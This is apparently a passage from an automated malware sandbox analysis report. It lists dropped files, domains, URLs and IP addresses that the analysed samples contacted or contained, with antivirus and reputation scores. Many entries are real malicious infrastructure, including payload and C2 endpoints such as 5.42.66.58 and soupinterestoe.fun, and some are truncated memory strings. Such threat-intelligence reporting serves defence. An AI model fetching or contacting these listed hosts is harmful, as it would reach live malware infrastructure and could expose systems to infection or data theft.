C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-4GFMI.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
opposesicknessopw.pw	0%	URL Reputation	safe
opposesicknessopw.pw	0%	URL Reputation	safe
politefrightenpowoa.pw	100%	URL Reputation	malware
soupinterestoe.fun	20%	Virustotal		Browse
chincenterblandwka.pw	8%	Virustotal		Browse
host-host-file8.com	20%	Virustotal		Browse
oshi.at	0%	Virustotal		Browse
host-file-host6.com	20%	Virustotal		Browse
46.138.7.0.in-addr.arpa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
dayfarrichjwclik.fun	0%	URL Reputation	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware	0%	Avira URL Cloud	safe
http://5.42.66.58/3886d2276f6914c4.phpposition:	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://5.42.66.58/3886d2276f6914c4.phpAwq	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://192.186.7.211:2001/	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://www.clocx.netopen	0%	Avira URL Cloud	safe
http://5.42.64.35/-core-win32k-fulluser-l1-1-0	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll(	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/p	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/pir$	100%	Avira URL Cloud	malware
http://www.avantbrowser.com)MOT-V9mm/	0%	Avira URL Cloud	safe
http://192.186.7.211:2001/	5%	Virustotal		Browse
http://soupinterestoe.fun/	100%	Avira URL Cloud	malware
http://5.42.66.58/3886d2276f6914c4.phpposition:	4%	Virustotal		Browse
http://5.42.66.58/3886d2276f6914c4.phpT	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/	20%	Virustotal		Browse
http://5.42.66.58/3886d2276f6914c4.phpK	0%	Avira URL Cloud	safe
https://chincenterblandwka.pw/api	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://soupinterestoe.fun/p	20%	Virustotal		Browse
http://soupinterestoe.fun/et-Coo	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/msvcp140.dllW	0%	Avira URL Cloud	safe
http://www.innosetup.com/	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/apih	100%	Avira URL Cloud	malware
http://5.42.66.58/3886d2276f6914c4.php1b525fcaad4dbf2097b84942422d3b5e5	0%	Avira URL Cloud	safe
http://www.innosetup.com/	2%	Virustotal		Browse
https://chincenterblandwka.pw/api	4%	Virustotal		Browse
http://soupinterestoe.fun/apim	100%	Avira URL Cloud	malware
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/apiz	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/;v	100%	Avira URL Cloud	malware
http://www.spidersoft.com)	0%	Avira URL Cloud	safe
http://5.42.66.58/f059ec3d7eb90876/sqlite3.dllWO	0%	Avira URL Cloud	safe
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	0%	Virustotal		Browse
http://soupinterestoe.fun/apim	16%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://5.42.66.58/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	2%	Virustotal		Browse
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://soupinterestoe.fun:80/api	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/kw	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/apiE	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/freebl3.dllMO	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/bohj;	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dllt	0%	Avira URL Cloud	safe
http://soupinterestoe.fun:80/api	23%	Virustotal		Browse
http://soupinterestoe.fun/obth;	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	2%	Virustotal		Browse
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/oe.	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll;	100%	Avira URL Cloud	malware
http://5.42.66.58/	14%	Virustotal		Browse
https://chincenterblandwka.pw/apiok	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/upi	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id22Responsey	0%	Avira URL Cloud	safe
http://5.42.64.35/syncUpd.exeSystem32	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	100%	Avira URL Cloud	malware
http://www.clocx.net	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13Response	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-w.us-east-1.amazonaws.com	54.231.140.225	true	false		high
bitbucket.org	104.192.141.1	true	false		high
chincenterblandwka.pw	104.21.64.47	true	true	8%, Virustotal, Browse	unknown
api4.ipify.org	104.237.62.212	true	false		high
host-host-file8.com	158.160.130.138	true	true	20%, Virustotal, Browse	unknown
oshi.at	194.15.112.248	true	false	0%, Virustotal, Browse	unknown
soupinterestoe.fun	104.21.24.252	true	true	20%, Virustotal, Browse	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false		high
host-file-host6.com	unknown	unknown	true	20%, Virustotal, Browse	unknown
opposesicknessopw.pw	unknown	unknown	true	0%, URL Reputation 0%, URL Reputation	unknown
api.ipify.org	unknown	unknown	false		high
politefrightenpowoa.pw	unknown	unknown	true	100%, URL Reputation	unknown
46.138.7.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://chincenterblandwka.pw/api	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
dayfarrichjwclik.fun	true	URL Reputation: safe	unknown
politefrightenpowoa.pw	true		unknown
http://api.ipify.org/?format=dfg	false		high
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1666612825.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0EE000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://5.42.66.58/3886d2276f6914c4.phpposition:	nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000053E000.00000040.00000001.01000000.0000001C.sdmp, nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1668045299.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://192.186.7.211:2001/	etopt.exe, 00000019.00000003.2425113770.0000000000566000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2425829377.0000000000566000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://5.42.66.58/3886d2276f6914c4.phpAwq	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.clocx.netopen	etopt.exe, 00000019.00000003.2430984027.000000000270A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.42.64.35/-core-win32k-fulluser-l1-1-0	InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll(	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/p	9E77.exe, 0000001E.00000003.2267849668.0000000002E13000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://soupinterestoe.fun/pir$	RegSvcs.exe, 00000020.00000002.2624545478.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.avantbrowser.com)MOT-V9mm/	31839b57a4f11171d6abc8bbc4451ee4.exe	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
http://soupinterestoe.fun/	RegSvcs.exe, 00000020.00000002.2624545478.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://5.42.66.58/3886d2276f6914c4.phpT	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://turnitin.com/robot/crawlerinfo.html)cannot	31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	false		high
http://www.exabot.com/go/robot)Opera/9.80	31839b57a4f11171d6abc8bbc4451ee4.exe	false	URL Reputation: safe	unknown
http://5.42.66.58/3886d2276f6914c4.phpK	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipify.org/?format=dfgll	InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/et-Coo	9E77.exe, 0000001E.00000003.2509151208.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2469219334.0000000002E46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/msvcp140.dllW	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innosetup.com/	tuc4.tmp, tuc4.tmp, 00000017.00000000.2070619074.0000000000401000.00000020.00000001.01000000.00000012.sdmp, tuc4.exe, 0000001B.00000003.2100722816.0000000002138000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 0000001B.00000003.2100181552.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 0000001D.00000002.3068746989.0000000000401000.00000020.00000001.01000000.00000018.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1669762259.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://soupinterestoe.fun/apih	RegSvcs.exe, 00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.com/bot.html)crypto/ecdh:	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://5.42.66.58/3886d2276f6914c4.php1b525fcaad4dbf2097b84942422d3b5e5	nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000053E000.00000040.00000001.01000000.0000001C.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apim	RegSvcs.exe, 00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	etopt.exe, 00000019.00000003.2470276376.000000000506F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.66.58/3886d2276f6914c4.phpt	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://soupinterestoe.fun/apiz	9E77.exe, 0000001E.00000003.2455472865.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2509151208.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2469219334.0000000002E46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://soupinterestoe.fun/;v	9E77.exe, 0000001E.00000003.2430555644.0000000002E14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spidersoft.com)	31839b57a4f11171d6abc8bbc4451ee4.exe	false	Avira URL Cloud: safe	low
http://5.42.66.58/f059ec3d7eb90876/sqlite3.dllWO	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://apis.juhe.cn/ip/Example/query.phpclient	etopt.exe, 00000019.00000002.2809624521.0000000003269000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.66.58/	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://https://_bad_pdb_file.pdb	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://soupinterestoe.fun:80/api	RegSvcs.exe, 00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:	4854.exe, 00000004.00000002.1911380987.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	RegSvcs.exe, 00000020.00000002.2620178999.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	etopt.exe, etopt.exe, 00000015.00000000.2065294700.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000000.2073405981.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000002.2807604369.000000000040A000.00000004.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000003.2802420858.000000000058C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/kw	9E77.exe, 0000001E.00000003.2430555644.0000000002E14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apiE	9E77.exe, 0000001E.00000003.2230342549.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.google.com/feedfetcher.html)HKLM	31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	false		high
https://blockchain.infoindex	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://5.42.66.58/f059ec3d7eb90876/freebl3.dllMO	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1669762259.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	9E77.exe, 0000001E.00000003.2456150443.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/bohj;	9E77.exe, 0000001E.00000003.2267849668.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2258193398.0000000002E12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alexa.com/help/webmasters;	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
http://tempuri.org/Entity/Id5Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dllt	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/obth;	9E77.exe, 0000001E.00000003.2455472865.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2509151208.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2469219334.0000000002E46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/oe.	9E77.exe, 0000001E.00000003.2244148293.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll;	nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://chincenterblandwka.pw/apiok	RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/upi	9E77.exe, 0000001E.00000003.2223543846.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1667327220.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1667663651.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1668750135.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22Responsey	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dc.services.visualstudio.com/v2/track	4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.64.35/syncUpd.exeSystem32	InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	false		high
http://www.clocx.net	etopt.exe, 00000019.00000003.2430984027.000000000270A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Response	RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.254.7	unknown	Bulgaria	34368	THEZONEBG	false
38.6.193.13	unknown	United States	174	COGENT-174US	false
185.215.113.68	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.64.47	chincenterblandwka.pw	United States	13335	CLOUDFLARENETUS	true
91.92.250.73	unknown	Bulgaria	34368	THEZONEBG	false
5.42.65.125	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
45.42.45.36	unknown	United States	62941	VARIANCEM-ASUS	false
194.15.112.248	oshi.at	Ukraine	213354	INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	false
54.231.140.225	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
5.42.65.31	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
195.20.16.103	unknown	Finland	42297	EITADAT-ASFI	true
104.237.62.212	api4.ipify.org	United States	18450	WEBNXUS	false
158.160.130.138	host-host-file8.com	Venezuela	721	DNIC-ASBLK-00721-00726US	true
185.196.9.220	unknown	Switzerland	42624	SIMPLECARRIERCH	false
5.42.66.58	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
104.21.24.252	soupinterestoe.fun	United States	13335	CLOUDFLARENETUS	true
5.42.64.35	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
